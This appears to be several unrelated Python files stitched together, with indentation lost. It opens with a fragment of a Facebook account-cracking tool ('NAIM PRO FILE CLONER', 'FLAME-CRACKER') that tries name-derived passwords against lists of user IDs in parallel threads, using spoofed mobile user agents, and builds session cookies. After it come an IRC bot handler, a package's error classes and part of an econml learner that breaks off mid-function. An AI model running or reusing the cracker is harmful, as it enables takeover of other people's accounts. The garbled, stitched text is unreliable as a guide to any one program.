with ThreadPoolExecutor(max_workers=20) as (_ngentot_gratis_):
for yntkts in self.id:
try:
uid, name = yntkts.split('|')
xz = name.split(' ')
if len(xz) == 1:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
elif len(xz) == 2:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
elif len(xz) == 3:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
elif len(xz) == 4:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
else:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
_ngentot_gratis_.submit(self.__mfb__, uid, pwx)
except:
pass
os.remove(self.apk)
hasil(ok,cp)
else:
flame_naim('\nSalah')
time.sleep(1)
self.__pler__()
def tahun(fx):
if len(fx)==15:
if fx[:10] in ['1000000000'] :tahunz = ' '
elif fx[:9] in ['100000000'] :tahunz = ' '
elif fx[:8] in ['10000000'] :tahunz = ' '
elif fx[:7] in ['1000000','1000001','1000002','1000003','1000004','1000005']:tahunz = ' '
elif fx[:7] in ['1000006','1000007','1000008','1000009']:tahunz = ' '
elif fx[:6] in ['100001'] :tahunz = ' '
elif fx[:6] in ['100002','100003'] :tahunz = ' '
elif fx[:6] in ['100004'] :tahunz = ' '
elif fx[:6] in ['100005','100006'] :tahunz = ' '
elif fx[:6] in ['100007','100008'] :tahunz = ' '
elif fx[:6] in ['100009'] :tahunz = ' '
elif fx[:5] in ['10001'] :tahunz = ' '
elif fx[:5] in ['10002'] :tahunz = ' '
elif fx[:5] in ['10003'] :tahunz = ' '
elif fx[:5] in ['10004'] :tahunz = ' '
elif fx[:5] in ['10005'] :tahunz = ' '
elif fx[:5] in ['10006','10007','10008']:tahunz = ' '
else:tahunz=''
elif len(fx) in [9,10]:
tahunz = ' '
elif len(fx)==8:
tahunz = ' '
elif len(fx)==7:
tahunz = ' '
else:tahunz=''
return tahunz
if __name__=='__main__':
os.system("git pull")
flame_ua_xaomi = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
flame_ua_nokia = 'nokiac3-00/5.0 (07.20) profile/midp-2.1 configuration/cldc-1.1 mozilla/5.0 applewebkit/420+ (khtml, like gecko) safari/420+'
flame_ua_asus = 'Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
flame_ua_huawei = 'Mozilla/5.0 (Linux; Android 8.1.0; HUAWEI Y7 PRIME 2019 Build/5887208) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
flame_ua_vivo = 'Mozilla/5.0 (Linux; Android 11; vivo 1918) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
flame_ua_oppo = 'Mozilla/5.0 (Linux; Android 5.1.1; A37f) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
flame_ua_samsung = 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]'
flame_ua_windows = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
banner="""
\033[1;32m## ## ### #### ## ##
### ## ## ## ## ### ###
#### ## ## ## ## #### ####
## ## ## ## ## ## ## ### ##
## #### ######### ## ## ##
## ### ## ## ## ## ##
## ## ## ## #### ## ##
╔════════════════════════════════════════╗
| \033[1;32m[*] \033[1;31mNAIM PRO FILE CLONER \033[1;32m[*] |
|════════════════════════════════════════|
| [*] AUTHOR > FLAME NAIM |
| [*] TOOLS > FLAME-CRACKER |
| [*] GITHUB > Naim75o |
| [*] FACEBOOK > FLAME NAIM |
╚════════════════════════════════════════╝
"""
ct = datetime.now()
n = ct.month
monthsx = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"]
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
urls="https://business.facebook.com/business_locations"
_ses=requests.Session()
def logo():
time.sleep(0.5)
os.system("clear")
print(banner)
print("")
time.sleep(0.5)
def convert(cok):
__for=(
'datr='+cok['datr']
)+';'+(
'c_user='+cok['c_user']
)+';'+(
'fr='+cok['fr']
)+';'+(
'xs='+cok['xs'] )
return __for
def sep():
os.system('clear')
logo()
try:
limit = int(input(' How many links do you want to separate? '))
except:
limit = 1
print ('\033[1;37m Example /sdcard/FLAME.txt')
file_name = input('\033[1;37m Input file name: ')
print ('\033[1;37m Example FLAME.txt')
new_save = input('\033[1;37m Save new file as: ')
y = 0
for k in range(limit):
y+=1
links = input(' Put links %s: '%(y))
os.system('cat '+file_name+' | grep "'+links+'" >> /sdcard/'+new_save)
print(50*'-')
print(' Links grabbed successfully')
print(' Total grabbed links: '+str(len(open('/sdcard/'+new_save).read().splitlines())))
print(' New file saved as: /sdcard/'+new_save)
print(50*'-')
input(' Press enter to back ')
readline___Public_Xml()
def dupcutter():
logo()
print("[*] File Duplicate Object Cutter - Auto Object ")
print("[*] Enter File Path / File Location \n\n")
naim4 = input('[->] File Path : ')
haider = input('[->] New File Save As : ')
os.system('touch ' +haider)
os.system('sort -r '+naim4+' | uniq > '+haider)
print("")
print("")
print(linesmall)
print("[*] Removing Successful From File " + naim4 )
print("[*] New File Save " + haider )
print(linesmall)
print("\n\n")
time.sleep(2)
if __name__=='__main__':
Subscraption()
mahdi() | PypiClean |
/CslBot-0.21-py3-none-any.whl/cslbot/helpers/handler.py |
import base64
import collections
import configparser
import copy
import logging
import random
import re
import threading
import time
from datetime import datetime, timedelta
from irc import client, modes
from typing import Callable, Dict # noqa
from . import acl, arguments, control, identity, misc, orm, registry, sql, textutils, workers
logger = logging.getLogger(__name__)
class BotHandler(object):
def __init__(self, config: configparser.ConfigParser, connection: client.ServerConnection, channels: Dict[str, str], confdir: str) -> None:
"""Set everything up.
| kick_enabled controls whether the bot will kick people or not.
| abuselist is a dict keeping track of how many times nicks have used
| rate-limited commands.
| modules is a dict containing the commands the bot supports.
| confdir is the path to the directory where the bot's config is stored.
| db - Is a db wrapper for data storage.
"""
self.connection = connection # type: client.ServerConnection
self.channels = channels
self.config = config # type: configparser.ConfigParser
self.db = sql.Sql(config, confdir) # type: sql.Sql
# FIXME: don't pass in self
self.workers = workers.Workers(self) # type: workers.Workers
self.guarded = [] # type: List[str]
self.voiced = collections.defaultdict(dict) # type: Dict[str,Dict[str,bool]]
self.opers = collections.defaultdict(dict) # type: Dict[str,Dict[str,bool]]
self.features = {'account-notify': False, 'extended-join': False, 'whox': False}
start = datetime.now()
self.uptime = {'start': start, 'reloaded': start}
self.abuselist = {} # type: Dict[str,Dict[str,datetime]]
self.ping_map = {} # type: Dict[str,str]
self.outputfilter = collections.defaultdict(list) # type: Dict[str,List[Callable[[str],str]]]
self.kick_enabled = True
self.who_map = {} # type: Dict[int,str]
self.flood_lock = threading.Lock()
self.data_lock = threading.RLock()
self.last_msg_time = datetime.now()
self.confdir = confdir
self.log_to_ctrlchan = False
def get_data(self):
"""Saves the handler's data for :func:`.reloader.do_reload`"""
data = {}
data['guarded'] = self.guarded[:]
data['voiced'] = copy.deepcopy(self.voiced)
data['opers'] = copy.deepcopy(self.opers)
data['features'] = self.features.copy()
data['uptime'] = self.uptime.copy()
data['abuselist'] = self.abuselist.copy()
data['who_map'] = self.who_map.copy()
return data
def set_data(self, data):
"""Called from :func:`.reloader.do_reload` to restore the handler's data."""
for key, val in data.items():
setattr(self, key, val)
self.uptime['reloaded'] = datetime.now()
def update_authstatus(self, nick):
if self.features['whox']:
tag = random.randint(0, 999)
self.who_map[tag] = nick
self.send_who(nick, tag)
elif self.config['feature']['servicestype'] == "ircservices":
self.rate_limited_send('privmsg', 'NickServ', 'STATUS %s' % nick)
elif self.config['feature']['servicestype'] == "atheme":
self.rate_limited_send('privmsg', 'NickServ', 'ACC %s' % nick)
def send_who(self, target, tag):
# http://faerion.sourceforge.net/doc/irc/whox.var
# n(show nicknames), a(show nickserv status), f(show channel status/modes), t(show tag)
self.rate_limited_send('who', '%s %%naft,%d' % (target, tag))
def is_admin(self, send, nick):
"""Checks if a nick is a admin.
If NickServ hasn't responded yet, then the admin is unverified,
so assume they aren't a admin.
"""
# Current roles are admin and owner, which is a superset of admin.
with self.db.session_scope() as session:
admin = session.query(orm.Permissions).filter(orm.Permissions.nick == nick).first()
if admin is None:
return False
# no nickserv support, assume people are who they say they are.
if not self.config['feature'].getboolean('nickserv'):
return True
if not admin.registered:
self.update_authstatus(nick)
# We don't necessarily want to complain in all cases.
if send is not None:
send("Unverified admin: %s" % nick, target=self.config['core']['channel'])
return False
else:
if not self.features['account-notify']:
# reverify every 5min if we don't have the notification feature.
if datetime.now() - admin.time > timedelta(minutes=5):
self.update_authstatus(nick)
return True
def get_admins(self):
"""Check verification for all admins."""
# no nickserv support, assume people are who they say they are.
if not self.config['feature'].getboolean('nickserv'):
return
with self.db.session_scope() as session:
for a in session.query(orm.Permissions).all():
if not a.registered:
self.update_authstatus(a.nick)
def abusecheck(self, send, nick, target, limit, cmd):
""" Rate-limits commands.
| If a nick uses commands with the limit attr set, record the time
| at which they were used.
| If the command is used more than `limit` times in a
| minute, ignore the nick.
"""
if nick not in self.abuselist:
self.abuselist[nick] = {}
if cmd not in self.abuselist[nick]:
self.abuselist[nick][cmd] = [datetime.now()]
else:
self.abuselist[nick][cmd].append(datetime.now())
count = 0
for x in self.abuselist[nick][cmd]:
# 60 seconds - arbitrary cuttoff
if datetime.now() - x < timedelta(seconds=60):
count = count + 1
if count > limit:
msg = "%s: don't abuse scores!" if cmd == 'scores' else "%s: stop abusing the bot!"
send(msg % nick, target=target)
with self.db.session_scope() as session:
send(misc.ignore(session, nick))
return True
@staticmethod
def get_max_length(target, msgtype):
overhead = r"PRIVMSG %s: \r\n" % target
# FIXME: what the hell is up w/ message length limits?
if msgtype == 'action':
overhead += "\001ACTION \001"
max_len = 454 # 512
else:
max_len = 453 # 512
return max_len - len(overhead.encode())
def send(self, target, nick, msg: str, msgtype, ignore_length=False, filters=None):
"""Send a message.
Records the message in the log.
"""
if not isinstance(msg, str):
raise Exception("Trying to send a %s to irc, only strings allowed." % type(msg).__name__)
msgs = []
if filters is None:
filters = self.outputfilter[target]
for i in filters:
if target != self.config['core']['ctrlchan']:
msg = i(msg)
# Avoid spam from commands that produce excessive output.
max_len = 650
msg_enc = [x.encode() for x in msg]
if sum(map(len, msg_enc)) > max_len and not ignore_length:
msg, _ = misc.split_msg(msg_enc, max_len)
msg += "..."
msg_enc = [x.encode() for x in msg]
max_len = self.get_max_length(target, msgtype)
# We can't send messages > 512 bytes to irc.
while sum(map(len, msg_enc)) > max_len:
split, msg_enc = misc.split_msg(msg_enc, max_len)
msgs.append(split)
msgs.append(''.join([x.decode() for x in msg_enc]).strip())
for i in msgs:
self.do_log(target, nick, i, msgtype)
if msgtype == 'action':
self.rate_limited_send('action', target, i)
else:
self.rate_limited_send('privmsg', target, i)
def rate_limited_send(self, mtype, target, msg=None):
with self.flood_lock:
elapsed = datetime.now() - self.last_msg_time
# Don't send messages more then once every 0.5 sec.
time.sleep(max(0, 0.5 - elapsed.total_seconds()))
if msg is None:
getattr(self.connection, mtype)(target)
else:
getattr(self.connection, mtype)(target, msg)
self.last_msg_time = datetime.now()
def do_log(self, target, nick, msg, msgtype):
"""Handles logging.
| Logs to a sql db.
"""
if not isinstance(msg, str):
raise Exception("IRC doesn't like it when you send it a %s" % type(msg).__name__)
target = target.lower()
flags = 0
# Properly handle /msg +#channel
if target.startswith(('+', '@')):
target = target[1:]
with self.data_lock:
if target in self.channels:
if self.opers[target].get(nick, False):
flags |= 1
if self.voiced[target].get(nick, False):
flags |= 2
else:
target = 'private'
# FIXME: should we special-case this?
# strip ctrl chars from !creffett
msg = msg.replace('\x02\x038,4', '<rage>')
self.db.log(nick, target, flags, msg, msgtype)
if self.log_to_ctrlchan:
ctrlchan = self.config['core']['ctrlchan']
if target != ctrlchan:
ctrlmsg = "%s:%s:%s:%s" % (target, msgtype, nick, msg)
# If we call self.send, we'll get a infinite loop.
self.connection.privmsg(ctrlchan, ctrlmsg.strip())
def do_part(self, cmdargs, nick, target, msgtype, send, c):
"""Leaves a channel.
Prevent user from leaving the primary channel.
"""
channel = self.config['core']['channel']
botnick = self.config['core']['nick']
if not cmdargs:
# don't leave the primary channel
if target == channel:
send("%s must have a home." % botnick)
return
else:
cmdargs = target
if not cmdargs.startswith(('#', '+', '@')):
cmdargs = '#' + cmdargs
# don't leave the primary channel
if cmdargs == channel:
send("%s must have a home." % botnick)
return
# don't leave the control channel
if cmdargs == self.config['core']['ctrlchan']:
send("%s must remain under control, or bad things will happen." % botnick)
return
self.send(cmdargs, nick, "Leaving at the request of %s" % nick, msgtype)
c.part(cmdargs)
def do_join(self, cmdargs, nick, msgtype, send, c):
"""Join a channel.
| Checks if bot is already joined to channel.
"""
if not cmdargs:
send("Join what?")
return
if cmdargs == '0':
send("I'm sorry, Dave. I'm afraid I can't do that.")
return
if not cmdargs.startswith(('#', '+', '@')):
cmdargs = '#' + cmdargs
cmd = cmdargs.split()
# FIXME: use argparse
if cmd[0] in self.channels and not (len(cmd) > 1 and cmd[1] == "force"):
send("%s is already a member of %s" % (self.config['core']['nick'], cmd[0]))
return
c.join(cmd[0])
self.send(cmd[0], nick, "Joined at the request of " + nick, msgtype)
def check_mode(self, mode):
if mode[2] != self.connection.real_nickname:
return False
if (mode[0], mode[1]) == ('-', 'o'):
return True
elif (mode[0], mode[1]) == ('+', 'b'):
return True
return False
def do_mode(self, target, msg, nick, send):
"""reop and handle guard violations."""
mode_changes = modes.parse_channel_modes(msg)
with self.data_lock:
for change in mode_changes:
if change[1] == 'v':
self.voiced[target][change[2]] = True if change[0] == '+' else False
if change[1] == 'o':
self.opers[target][change[2]] = True if change[0] == '+' else False
# reop
# FIXME: handle -o+o msbobBot msbobBot
if [x for x in mode_changes if self.check_mode(x)]:
send("%s: :(" % nick, target=target)
# Assume bot admins know what they're doing.
if not self.is_admin(None, nick):
send("OP %s" % target, target='ChanServ')
send("UNBAN %s" % target, target='ChanServ')
if len(self.guarded) > 0:
# if user is guarded and quieted, devoiced, or deopped, fix that
regex = r"(.*(-v|-o|\+q|\+b)[^ ]*) (%s)" % "|".join(self.guarded)
match = re.search(regex, msg)
if match and nick not in [match.group(3), self.connection.real_nickname]:
modestring = "+voe-qb %s" % (" ".join([match.group(3)] * 5))
self.connection.mode(target, modestring)
send('Mode %s on %s by the guard system' % (modestring, target), target=self.config['core']['ctrlchan'])
def do_kick(self, send, target, nick, msg, slogan=True):
"""Kick users.
- If kick is disabled, don't do anything.
- If the bot is not a op, rage at a op.
- Kick the user.
"""
if not self.kick_enabled:
return
if target not in self.channels:
send("%s: you're lucky, private message kicking hasn't been implemented yet." % nick)
return
with self.data_lock:
ops = [k for k, v in self.opers[target].items() if v]
botnick = self.config['core']['nick']
if botnick not in ops:
ops = ['someone'] if not ops else ops
send(textutils.gen_creffett("%s: /op the bot" % random.choice(ops)), target=target)
elif random.random() < 0.01 and msg == "shutting caps lock off":
if nick in ops:
send("%s: HUEHUEHUE GIBE CAPSLOCK PLS I REPORT U" % nick, target=target)
else:
self.connection.kick(target, nick, "HUEHUEHUE GIBE CAPSLOCK PLS I REPORT U")
else:
msg = textutils.gen_slogan(msg).upper() if slogan else msg
if nick in ops:
send("%s: %s" % (nick, msg), target=target)
else:
self.connection.kick(target, nick, msg)
def do_args(self, modargs, send, nick, target, source, name, msgtype):
"""Handle the various args that modules need."""
realargs = {}
args = {'nick': nick,
'handler': self,
'db': None,
'config': self.config,
'source': source,
'name': name,
'type': msgtype,
'botnick': self.connection.real_nickname,
'target': target if target[0] == "#" else "private",
'do_kick': lambda target, nick, msg: self.do_kick(send, target, nick, msg),
'is_admin': lambda nick: self.is_admin(send, nick),
'abuse': lambda nick, limit, cmd: self.abusecheck(send, nick, target, limit, cmd)}
for arg in modargs:
if arg in args:
realargs[arg] = args[arg]
else:
raise Exception("Invalid Argument: %s" % arg)
return realargs
def do_welcome(self):
"""Do setup when connected to server.
- Join the primary channel.
- Join the control channel.
"""
self.rate_limited_send('join', self.config['core']['channel'])
self.rate_limited_send('join', self.config['core']['ctrlchan'], self.config['auth']['ctrlkey'])
# We use this to pick up info on admins who aren't currently in a channel.
self.workers.defer(5, False, self.get_admins)
extrachans = self.config['core']['extrachans']
if extrachans:
for chan in [x.strip() for x in extrachans.split(',')]:
self.rate_limited_send('join', chan)
def is_ignored(self, nick):
with self.db.session_scope() as session:
return session.query(orm.Ignore).filter(orm.Ignore.nick == nick).count()
def get_filtered_send(self, cmdargs, send, target):
"""Parse out any filters."""
parser = arguments.ArgParser(self.config)
parser.add_argument('--filter')
try:
filterargs, remainder = parser.parse_known_args(cmdargs)
except arguments.ArgumentException as ex:
return str(ex), None
cmdargs = ' '.join(remainder)
if filterargs.filter is None:
return cmdargs, send
filter_list, output = textutils.append_filters(filterargs.filter)
if filter_list is None:
return output, None
# define a new send to handle filter chaining
def filtersend(msg, mtype='privmsg', target=target, ignore_length=False):
self.send(target, self.connection.real_nickname, msg, mtype, ignore_length, filters=filter_list)
return cmdargs, filtersend
def do_rejoin(self, c, e):
# If we're still banned, this will trigger a bannedfromchan event so we'll try again.
if e.arguments[0] not in self.channels:
c.join(e.arguments[0])
def handle_event(self, msg, send, c, e):
if e.type == 'whospcrpl':
self.handle_who(e)
elif e.type == 'account':
self.handle_account(e)
elif e.type == 'authenticate':
self.handle_authenticate(e)
elif e.type == 'bannedfromchan':
self.workers.defer(5, False, self.do_rejoin, c, e)
elif e.type == 'cap':
self.handle_cap(e)
elif e.type in ['ctcpreply', 'nosuchnick']:
misc.ping(self.ping_map, c, e, datetime.now())
elif e.type == 'error':
logger.error(e.target)
elif e.type == 'featurelist':
if 'WHOX' in e.arguments:
self.features['whox'] = True
elif e.type == 'nick':
self.handle_nick(send, e)
elif e.type == 'nicknameinuse':
self.connection.nick('Guest%d' % random.getrandbits(20))
elif e.type == 'privnotice':
if e.source.nick == 'NickServ':
# FIXME: don't pass self
acl.set_admin(msg, self)
elif e.type == 'welcome':
self.handle_welcome()
def handle_authenticate(self, e):
passwd = self.config['auth']['serverpass']
user = self.config['core']['nick']
if e.target == '+':
token = base64.b64encode('\0'.join([user, user, passwd]).encode())
self.connection.send_raw('AUTHENTICATE %s' % token.decode())
self.connection.cap('END')
def handle_account(self, e):
with self.db.session_scope() as session:
admin = session.query(orm.Permissions).filter(orm.Permissions.nick == e.source.nick).first()
if admin is not None:
if e.target == '*':
admin.registered = False
else:
admin.registered = True
admin.time = datetime.now()
def handle_welcome(self):
passwd = self.config['auth']['serverpass']
user = self.config['core']['nick']
logger.info("Connected to server %s", self.config['core']['host'])
if self.config.getboolean('feature', 'nickserv') and self.connection.real_nickname != self.config['core']['nick']:
self.connection.privmsg('NickServ', 'REGAIN %s %s' % (user, passwd))
self.do_welcome()
def handle_who(self, e):
# arguments: tag,nick,modes,account
# modes = H(here) or G(away), +(voice), @(oper)
# account is the nicksev account if authed, else 0
# properly track voiced status.
location = self.who_map[int(e.arguments[0])]
# FIXME: devoice if G in modes
self.voiced[location][e.arguments[1]] = '+' in e.arguments[2]
self.opers[location][e.arguments[1]] = '@' in e.arguments[2]
with self.db.session_scope() as session:
admin = session.query(orm.Permissions).filter(orm.Permissions.nick == e.arguments[1]).first()
if admin is not None:
if e.arguments[3] != '0':
admin.registered = True
admin.time = datetime.now()
def handle_cap(self, e):
if e.arguments[0] == 'ACK':
if e.arguments[1].strip() == 'sasl':
self.connection.send_raw('AUTHENTICATE PLAIN')
elif e.arguments[1].strip() == 'account-notify':
self.features['account-notify'] = True
elif e.arguments[1].strip() == 'extended-join':
self.features['extended-join'] = True
def handle_nick(self, send, e):
with self.data_lock:
for channel in misc.get_channels(self.channels, e.target):
self.do_log(channel, e.source.nick, e.target, 'nick')
# Move the voice+op status to the new nick
if e.source.nick in self.voiced[channel].keys(): # In case we somehow didn't set the voice state on the old nick
self.voiced[channel][e.target] = self.voiced[channel].pop(e.source.nick)
if e.source.nick in self.opers[channel].keys(): # As above, for ops
self.opers[channel][e.target] = self.opers[channel].pop(e.source.nick)
if identity.handle_nick(self, e):
for x in misc.get_channels(self.channels, e.target):
self.do_kick(send, x, e.target, "identity crisis")
def handle_join(self, c, e, target, send):
# Get status for all nicks in-channel when we join, or the new nick when somebody else joins.
if self.features['whox']:
tag = random.randint(0, 999)
self.who_map[tag] = target
if e.source.nick == c.real_nickname:
self.send_who(target, tag)
else:
self.send_who(e.source.nick, tag)
if e.source.nick == c.real_nickname:
send("Joined channel %s" % target, target=self.config['core']['ctrlchan'])
elif self.features['extended-join']:
with self.db.session_scope() as session:
admin = session.query(orm.Permissions).filter(orm.Permissions.nick == e.source.nick).first()
if admin is not None:
if e.arguments[0] == '*':
admin.registered = False
else:
admin.registered = True
admin.time = datetime.now()
def get_cmd(self, msg):
cmd = msg.split()[0]
cmdchar = self.config['core']['cmdchar']
cmdlen = len(cmd) + 1
# FIXME: figure out a better way to handle !s
if cmd.startswith('%ss' % cmdchar):
# escape special regex chars
raw_cmdchar = '\\' + cmdchar if re.match(r'[\[\].^$*+?]', cmdchar) else cmdchar
match = re.match(r'%ss(\W)' % raw_cmdchar, cmd)
if match:
cmd = cmd.split(match.group(1))[0]
cmdlen = len(cmd)
cmdargs = msg[cmdlen:]
cmd_name = cmd[len(cmdchar):].lower() if cmd.startswith(cmdchar) else None
return cmd_name, cmdargs
def run_cmd(self, send, nick, target, cmd_name, cmdargs, e):
cmdargs, filtersend = self.get_filtered_send(cmdargs, send, target)
if filtersend is None:
send(cmdargs)
return
cmd_obj = registry.command_registry.get_command(cmd_name)
if cmd_obj.is_limited() and self.abusecheck(send, nick, target, cmd_obj.limit, cmd_name):
return
with self.db.session_scope() as session:
if not cmd_obj.has_role(session, nick):
send("Insufficent privileges for command.")
return
args = self.do_args(cmd_obj.args, send, nick, target, e.source, cmd_name, e.type)
cmd_obj.run(filtersend, cmdargs, args, cmd_name, nick, target, self)
def handle_kick(self, c, e, target, send):
if e.arguments[0] == c.real_nickname:
send("Kicked from channel %s" % target, target=self.config['core']['ctrlchan'])
# Auto-rejoin after 5 seconds.
self.workers.defer(5, False, self.connection.join, target)
def handle_hooks(self, send, nick, target, e, msg):
if self.config['feature'].getboolean('hooks'):
for h in registry.hook_registry.get_hook_objects():
realargs = self.do_args(h.args, send, nick, target, e.source, h, e.type)
h.run(send, msg, e.type, self, target, realargs)
def handle_msg(self, c, e):
"""The Heart and Soul of IrcBot."""
if e.type not in ['authenticate', 'error', 'join', 'part', 'quit']:
nick = e.source.nick
else:
nick = e.source
if e.arguments is None:
msg = ""
else:
msg = " ".join(e.arguments).strip()
# Send the response to private messages to the sending nick.
target = nick if e.type == 'privmsg' else e.target
def send(msg, mtype='privmsg', target=target, ignore_length=False):
self.send(target, self.connection.real_nickname, msg, mtype, ignore_length)
if e.type in ['account', 'authenticate', 'bannedfromchan', 'cap', 'ctcpreply', 'error', 'featurelist', 'nosuchnick', 'nick', 'nicknameinuse',
'privnotice', 'welcome', 'whospcrpl']:
self.handle_event(msg, send, c, e)
return
# ignore empty messages
if not msg and e.type != 'join':
return
self.do_log(target, nick, msg, e.type)
if e.type == 'mode':
self.do_mode(target, msg, nick, send)
return
if e.type == 'join':
self.handle_join(c, e, target, send)
return
if e.type == 'part':
if nick == c.real_nickname:
send("Parted channel %s" % target, target=self.config['core']['ctrlchan'])
return
if e.type == 'kick':
self.handle_kick(c, e, target, send)
return
if e.target == self.config['core']['ctrlchan'] and self.is_admin(None, nick):
control.handle_ctrlchan(self, msg, send)
if self.is_ignored(nick) and not self.is_admin(None, nick):
return
self.handle_hooks(send, nick, target, e, msg)
msg = misc.get_cmdchar(self.config, c, msg, e.type)
cmd_name, cmdargs = self.get_cmd(msg)
if registry.command_registry.is_registered(cmd_name):
self.run_cmd(send, nick, target, cmd_name, cmdargs, e)
# special commands
elif cmd_name == 'reload':
with self.db.session_scope() as session:
if session.query(orm.Permissions).filter(orm.Permissions.nick == nick).count():
send("Aye Aye Capt'n") | PypiClean |
/Checkpoint-0.2b1.tar.gz/Checkpoint-0.2b1/checkpoint/error.py |
from textwrap import dedent
from traceback import format_stack
__all__ = [
'NoChanges', 'CheckpointBug', 'CheckpointError', 'RepositoryLocked',
'NotFound', 'InvalidCommand', 'FileError', 'RepositoryError',
'UnsupportedFileType', 'VersionError', 'UninitializedRepositoryError',
'MirrorLocked', 'PropertyNotFound'
]
class CheckpointError(Exception):
"""Base class for anticipated errors in the checkpoint package"""
def __init__(self, message=None):
self.message = message
if self.message is None:
self.message = dedent(self.__class__.__doc__)
def __str__(self):
return getattr(self, 'message', '')
class CheckpointBug(CheckpointError):
"""Error indicates a bug in the checkpoint API"""
def __init__(self, message=""):
self.message = (
"Unrecoverable Error!\n" + message + "\n" +
("Traceback (most recent call last):\n%s" % format_stack()) +
dedent("""
This could be a bug in Checkpoint.
Please report this bug as described at
http://something something something....
""")
)
def __str__(self):
return getattr(self, 'message', '')
class RepositoryLocked(CheckpointError):
"""Repository is locked."""
def __init__(self):
self.message = dedent("""
--------------------------------------------------------------
!!! Repository is Locked! !!!
This could be because another process has the repository open.
Most likely though, it means the last repository command has
failed or crashed, leaving the repository dirty. Try the
'recover' command to attempt to fix the repository. If that
doesn't work, manual crash-recovery may be the only option.
Check the documentation for more information.
--------------------------------------------------------------
""")
class MirrorLocked(CheckpointError):
"""Mirror is locked."""
def __init__(self):
self.message = dedent("""
--------------------------------------------------------------
!!! Mirror is Locked! !!!
This could be because another process has the mirror open.
Most likely though, it means the last mirror command has
failed or crashed, leaving the mirror dirty. Try the
'recover' command to attempt to fix the mirror. If that
doesn't work, manual crash-recovery may be the only option.
Check the documentation for more information.
--------------------------------------------------------------
""")
class NoChanges(CheckpointError):
"""Indicates no changes were made to repository or directory"""
class NotFound(CheckpointError):
"""Specified file or directory does not exist."""
def __init__(self, path):
self.message = "File or directory not found: %r" % path
class PropertyNotFound(CheckpointError):
"""Specified property does not exist on specified path."""
def __init__(self, propname, path):
self.message = "Property %r not found on %r" % (propname, path)
class InvalidCommand(CheckpointError):
"""Specified command is not a valid Checkpoint command."""
class FileError(CheckpointError):
"""File operation error - error during rm, copy, mv, etc."""
class RepositoryError(CheckpointError):
"""Repository operation error - error during read, write, or create."""
class UninitializedRepositoryError(CheckpointError):
"""Repository must be initialized for this operation to succeed."""
class UninitializedMirrorError(CheckpointError):
"""Mirror must be initialized for this operation to succeed."""
class UnsupportedFileType(CheckpointError):
"""Unsupported file type (link, socket, pipe, device) was encountered."""
def __init__(self, path):
self.message = "Unsupported file type: %r" % path
class VersionError(CheckpointError):
"""Repository format is incompatible with this version of Checkpoint.""" | PypiClean |
/BEATAALU-0.13.1.tar.gz/BEATAALU-0.13.1/econml/dr/_drlearner.py | from warnings import warn
from copy import deepcopy
import numpy as np
from sklearn.base import clone
from sklearn.linear_model import (LassoCV, LinearRegression,
LogisticRegressionCV)
from sklearn.ensemble import RandomForestRegressor
from .._ortho_learner import _OrthoLearner
from .._cate_estimator import (DebiasedLassoCateEstimatorDiscreteMixin,
ForestModelFinalCateEstimatorDiscreteMixin,
StatsModelsCateEstimatorDiscreteMixin, LinearCateEstimator)
from ..inference import GenericModelFinalInferenceDiscrete
from ..grf import RegressionForest
from ..sklearn_extensions.linear_model import (
DebiasedLasso, StatsModelsLinearRegression, WeightedLassoCVWrapper)
from ..utilities import (_deprecate_positional, check_high_dimensional,
filter_none_kwargs, fit_with_groups, inverse_onehot, get_feature_names_or_default)
from .._shap import _shap_explain_multitask_model_cate, _shap_explain_model_cate
class _ModelNuisance:
def __init__(self, model_propensity, model_regression, min_propensity):
self._model_propensity = model_propensity
self._model_regression = model_regression
self._min_propensity = min_propensity
def _combine(self, X, W):
return np.hstack([arr for arr in [X, W] if arr is not None])
def fit(self, Y, T, X=None, W=None, *, sample_weight=None, groups=None):
if Y.ndim != 1 and (Y.ndim != 2 or Y.shape[1] != 1):
raise ValueError("The outcome matrix must be of shape ({0}, ) or ({0}, 1), "
"instead got {1}.".format(len(X), Y.shape))
if (X is None) and (W is None):
raise AttributeError("At least one of X or W has to not be None!")
if np.any(np.all(T == 0, axis=0)) or (not np.any(np.all(T == 0, axis=1))):
raise AttributeError("Provided crossfit folds contain training splits that " +
"don't contain all treatments")
XW = self._combine(X, W)
filtered_kwargs = filter_none_kwargs(sample_weight=sample_weight)
fit_with_groups(self._model_propensity, XW, inverse_onehot(T), groups=groups, **filtered_kwargs)
fit_with_groups(self._model_regression, np.hstack([XW, T]), Y, groups=groups, **filtered_kwargs)
return self
def score(self, Y, T, X=None, W=None, *, sample_weight=None, groups=None):
XW = self._combine(X, W)
filtered_kwargs = filter_none_kwargs(sample_weight=sample_weight)
if hasattr(self._model_propensity, 'score'):
propensity_score = self._model_propensity.score(XW, inverse_onehot(T), **filtered_kwargs)
